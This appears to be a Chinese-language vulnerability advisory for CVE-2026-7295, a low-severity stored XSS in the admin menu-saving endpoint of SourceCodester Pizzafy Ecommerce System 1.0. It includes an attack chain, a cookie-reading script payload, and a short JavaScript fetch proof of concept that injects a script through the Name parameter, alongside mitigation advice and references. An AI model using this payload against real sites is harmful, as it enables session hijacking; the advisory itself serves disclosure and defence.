CVE-2026-7295 CVSS 2.4 低危

CVE-2026-7295 Pizzafy电商系统存储型XSS漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7295

漏洞类型

XSS (跨站脚本)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

SourceCodester Pizzafy Ecommerce System

漏洞概述

SourceCodester Pizzafy Ecommerce System 1.0版本中存在一个跨站脚本（XSS）漏洞。该漏洞源于/admin/ajax.php文件中的save_menu函数未能正确处理用户输入，具体表现为对Name参数的过滤不严。攻击者可以通过操纵该参数注入恶意脚本，由于该漏洞需要高权限和用户交互才能触发，风险相对较低，但仍可能导致信息泄露或会话劫持。

技术细节

该漏洞属于存储型跨站脚本攻击（Stored XSS）。在SourceCodester Pizzafy Ecommerce System 1.0中，当管理员通过/admin/ajax.php?action=save_menu接口添加或修改菜单项时，后端代码未对POST请求中的Name参数进行充分的输入验证和HTML实体编码。攻击者若拥有管理员权限，可在Name字段中植入恶意的JavaScript代码（如`<script>alert(document.cookie)</script>`）。该数据会被直接存储在数据库中。当其他管理员或用户访问后台菜单管理页面时，存储的恶意脚本会在浏览器端被解析并执行，从而窃取Cookie或进行恶意操作。

攻击链分析

STEP 1

步骤1

攻击者获取高权限账户（管理员）访问权限。

STEP 2

步骤2

攻击者访问菜单管理功能，向/admin/ajax.php?action=save_menu发送请求。

STEP 3

步骤3

攻击者在Name参数中注入恶意JavaScript代码并提交。

STEP 4

步骤4

服务器将未经过滤的恶意代码存储在数据库中。

STEP 5

步骤5

受害者（如其他管理员）访问包含该菜单的页面。

STEP 6

步骤6

受害者的浏览器解析并执行恶意脚本，导致攻击生效。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-7295
 * Target: SourceCodester Pizzafy Ecommerce System 1.0
 * Endpoint: /admin/ajax.php?action=save_menu
 */

// Malicious payload to be injected into the 'Name' parameter
let payload = '<script>alert("CVE-2026-7295 XSS")</script>';

// Simulate the vulnerable request
fetch('/admin/ajax.php?action=save_menu', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': 'PHPSESSID=[ADMIN_SESSION_ID]' // Requires Admin session
    },
    body: `name=${encodeURIComponent(payload)}&description=Test&price=10`
})
.then(response => response.text())
.then(data => console.log(data));

// Trigger: Visit the menu page to see the alert.

影响范围

SourceCodester Pizzafy Ecommerce System 1.0

防御指南

临时缓解措施

建议管理员暂时限制后台管理权限的分配，并对已存储的菜单数据进行排查，清理可疑的脚本内容。开发者应尽快修补代码，确保对所有输入点进行安全处理。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7295
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7295
3 Details https://www.cvedetails.com/cve/CVE-2026-7295/
4 VulDB https://vuldb.com/cve/CVE-2026-7295
5 Link https://github.com/joaodrmmd/VulDB-Reports/blob/main/XSS%20-%20Menu.pdf
6 Link https://vuldb.com/submit/803173
7 Link https://vuldb.com/vuln/359955
8 Link https://vuldb.com/vuln/359955/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表